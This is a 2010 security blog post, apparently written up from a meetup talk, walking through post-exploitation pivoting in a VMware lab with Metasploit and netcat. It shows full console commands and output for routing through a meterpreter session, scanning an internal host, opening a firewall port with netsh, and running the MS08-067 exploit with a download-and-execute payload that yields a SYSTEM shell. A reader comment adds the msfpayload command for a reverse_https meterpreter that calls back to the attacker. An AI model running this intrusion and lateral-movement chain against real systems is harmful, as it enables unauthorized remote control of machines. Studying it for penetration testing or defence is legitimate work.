Search This Blog

Sunday, November 28, 2010

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" in null monthly meet.
So here is post about the presentation and things I may have missed.

Aim:
There is a compromised machine in a network and you want to find/target other nodes inside the network.

Scenario:
Attacker running BackTrack sitting outside the network. Machine A (Pivot) and machine B behind the NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address : 192.168.74.128
Netmask : 255.255.255.0


meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.74.2
127.0.0.0 255.0.0.0 127.0.0.1
192.168.74.0 255.255.255.0 192.168.74.128
192.168.74.128 255.255.255.255 127.0.0.1
192.168.74.255 255.255.255.255 192.168.74.128
224.0.0.0 240.0.0.0 192.168.74.128
255.255.255.255 255.255.255.255 192.168.74.128

meterpreter >

1. Pass the traffic for desired subnet through meterpreter session:
So, in order to run scans and use other modules of meterpreter, we would need to add route so that when we target a particular subnet it will be routed through meterpreter session.
Let's see, how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.74.0 255.255.255.0 Session 1

msf exploit(handler) >

So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will be using meterpreter module arp_scanner to scan the network.

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

-h Help menu.
-i Enumerate Local Interfaces
-r The target address range or CIDR identifier
-s Save found IP Addresses to logs.


meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >


Ok. As you can see, there are 5 IP addresses seems alive in the network.
The IP address 192.168.74.1, 192.168.74.2 and 192.168.74.254 are of VMware workstation virtual network adapters.
The distribution is like
192.168.74.2 - gateway IP address of virtual machine behind NAT
192.168.74.1 - external IP address(vmnet8)
192.168.74.254 - DHCP server for virtual machines behind NAT

So, apart from all that, there is one more virtual machine which can be of our interest.
Let's find out...



We will use tcp portscanner auxiliary module to find out the open ports...(with some well-known ports)

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Alright. So there seems to be sharing enabled on the target machine.
We will use infamous ms08_067 exploit...

But, now there are problems choosing appropriate payload.
- Bindshell payload can't be used, as we have no direct access to machine B. So even if machine B gets infected and starts listening on some port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads also can't be used, assuming the situation that machine B has no direct internet access.

So, all I did was uploaded netcat and a custom file which is combination of a HTTP-response appended with meterpreter client executable(in this case if successful, of course, it would reverse connect back to the listening multi/handler on attacker's machine and so to confirm that the exploit was successful).

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading : /tmp/netcat.exe -> %temp%
[*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >

Ok.
So now we will start a small webserver using netcat on pivot machine with redirecting httpresponse-msf.cfg(can have any extension).

meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 080D-40BD

Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010 01:57 AM <DIR> .
12/05/2010 01:57 AM <DIR> ..
10/23/2009 07:30 PM 8,704 21227.mst
10/23/2009 07:30 PM 8,704 21ad2.mst
10/23/2009 07:30 PM 8,704 48f1e.mst
10/23/2009 07:30 PM 8,704 c833.mst
08/15/2009 02:54 AM 8,704 ff21.mst
12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg
12/05/2010 01:57 AM 61,440 netcat.exe
10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log
06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log
09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log
09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log
11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log
09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log
09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log
11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log
11/29/2010 03:54 PM <DIR> VMwareDnD
18 File(s) 17,424,123 bytes
3 Dir(s) 40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>




Oops. Looks like somebody is interfering with our business.
The firewall on pivot machine may interfere to open a port on listening mode.
But, we got access of this machine and here is how we can add an exception in firewall...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.


C:\DOCUME~1\user\LOCALS~1\Temp>


Ok. So now we were able to open port number 80 and enabled it for listening mode.
Alright, so let's run netcat as we had done once again.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.74.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/download_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
URL http://192.168.74.128/ yes The pre-encoded URL to the executable


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit was successful and it opened meterpreter session 2 connecting back to the attacker's machine.

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address : 192.168.74.129
Netmask : 255.255.255.0


meterpreter >



..............Done!!!

4 comments:

  1. Can you share the httpresponse-msf.cfg file?

    ReplyDelete
  2. httpresponse-msf.cfg file?

    ReplyDelete
  3. Sorry for so late replies:

    @rajsumeru Thank you

    @anonymous you can create the file as follows:

    -Create a text file with http-response

    HTTP/1.1 200 OK
    Date: Sat, 27 Nov 2010 07:37:41 GMT
    Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.5 with Suhosin-Patch
    Last-Modified: Sat, 27 Nov 2010 07:31:34 GMT
    ETag: "d3ffd-1204a-49603d4142180"
    Accept-Ranges: bytes
    Content-Length: 73802
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program


    And append the msf.exe(created by
    $ msfpayload windows/meterpreter/reverse_https LHOST=172.16.24.130 LPORT=443 X > msf.exe
    )

    In case, you still in doubt, you can send me mail at sagar dot belure at gmail dot com. And I will send you the file across.

    ReplyDelete